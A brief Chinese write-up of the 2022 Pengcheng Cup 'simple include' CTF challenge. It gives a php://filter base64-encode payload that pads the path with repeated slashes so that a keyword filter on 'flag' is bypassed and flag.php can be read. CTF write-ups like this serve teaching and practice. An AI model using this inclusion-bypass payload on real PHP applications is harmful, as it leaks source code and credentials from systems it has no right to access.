文章讲述了在鹏城杯2022的NSSCTF挑战中,如何通过构造特定的payload,利用php的filter功能和base64编码来绕过对flag的过滤,达到读取资源的目的。关键在于不断尝试不同组合,数量足够即可。
题目
[鹏城杯 2022]简单包含
看到题目的那一刻,判断它是对 “flag”进行了过滤,所以
一直添加数据就行了
payload
flag=php://filter///read=convert.base64-encode/resource=flag.php只要数量够多就行,不一定是 / 其他的都是可以的
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
